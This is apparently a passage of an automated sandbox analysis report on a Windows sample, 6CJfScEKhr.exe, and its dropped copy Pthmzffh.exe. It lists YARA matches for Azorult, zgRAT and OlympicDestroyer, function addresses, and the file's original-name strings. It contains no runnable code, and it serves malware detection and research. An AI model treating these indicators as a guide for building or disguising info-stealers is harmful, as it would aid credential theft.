              Source: 14.2.6CJfScEKhr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.6CJfScEKhr.exe.3999510.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 21.2.Pthmzffh.exe.3f39510.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 14.2.6CJfScEKhr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.2.6CJfScEKhr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.Pthmzffh.exe.3459510.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 15.2.Pthmzffh.exe.3459510.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0.2.6CJfScEKhr.exe.3ab3f70.4.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 0.2.6CJfScEKhr.exe.3ab3f70.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 21.2.Pthmzffh.exe.c4b0000.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 14.2.6CJfScEKhr.exe.3fb2a00.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 14.2.6CJfScEKhr.exe.3fb7354.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 14.2.6CJfScEKhr.exe.4008740.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
              Source: 6CJfScEKhr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
              Source: 14.0.6CJfScEKhr.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.Pthmzffh.exe.bb30000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0.2.6CJfScEKhr.exe.3999510.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0.2.6CJfScEKhr.exe.be90000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 21.2.Pthmzffh.exe.3f39510.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 21.2.Pthmzffh.exe.c4b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 14.0.6CJfScEKhr.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.6CJfScEKhr.exe.be90000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 14.0.6CJfScEKhr.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.Pthmzffh.exe.bb30000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 14.2.6CJfScEKhr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.2.6CJfScEKhr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.6CJfScEKhr.exe.3999510.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 21.2.Pthmzffh.exe.3f39510.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 14.2.6CJfScEKhr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.2.6CJfScEKhr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.Pthmzffh.exe.3459510.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 15.2.Pthmzffh.exe.3459510.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0.2.6CJfScEKhr.exe.3ab3f70.4.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0.2.6CJfScEKhr.exe.3ab3f70.4.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 14.0.6CJfScEKhr.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 14.0.6CJfScEKhr.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 21.2.Pthmzffh.exe.c4b0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 14.2.6CJfScEKhr.exe.3fb2a00.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 14.2.6CJfScEKhr.exe.3fb7354.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 14.2.6CJfScEKhr.exe.4008740.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D707300_2_00D70730
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D70C900_2_00D70C90
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D7E3480_2_00D7E348
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D7252C0_2_00D7252C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D709B80_2_00D709B8
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D709AA0_2_00D709AA
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D7EA000_2_00D7EA00
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022B073015_2_022B0730
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022B0C9015_2_022B0C90
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022BE34815_2_022BE348
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022BE66615_2_022BE666
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022B252C15_2_022B252C
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022BE59315_2_022BE593
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022BEA0015_2_022BEA00
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022B09AA15_2_022B09AA
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022B09B815_2_022B09B8
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_022B0C8A15_2_022B0C8A
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_04A7C42815_2_04A7C428
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_04A7F04015_2_04A7F040
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_04A7F82815_2_04A7F828
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_04A7D52015_2_04A7D520
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 15_2_04A7C76815_2_04A7C768
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013A074021_2_013A0740
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013A0C9021_2_013A0C90
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013AE34821_2_013AE348
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013A252C21_2_013A252C
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013A09B821_2_013A09B8
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013A09A921_2_013A09A9
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013AEA0021_2_013AEA00
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_013A0C8021_2_013A0C80
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C5FC43821_2_0C5FC438
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C5FEFB221_2_0C5FEFB2
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C5FF82821_2_0C5FF828
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C5FD4B821_2_0C5FD4B8
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C5FC76821_2_0C5FC768
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71CF7021_2_0C71CF70
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71B09821_2_0C71B098
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71B1EA21_2_0C71B1EA
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71B5F821_2_0C71B5F8
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71D08121_2_0C71D081
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71BAA121_2_0C71BAA1
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71BB9821_2_0C71BB98
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeCode function: 21_2_0C71080621_2_0C710806
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: String function: 00404E64 appears 33 times
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: String function: 004062D8 appears 34 times
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: String function: 00403B98 appears 44 times
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: String function: 00404E3C appears 87 times
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: String function: 004034E4 appears 36 times
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-private-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-multibyte-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
              Source: 6CJfScEKhr.exe, 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameApwjojdzaicrizygsmmd.dll" vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 00000000.00000000.238586704.000000000051F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSngggz.exe. vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApwjojdzaicrizygsmmd.dll" vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 00000000.00000002.405546179.0000000000E5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSngggz.exe. vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.493285789.00000000047B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.434459144.0000000003E50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
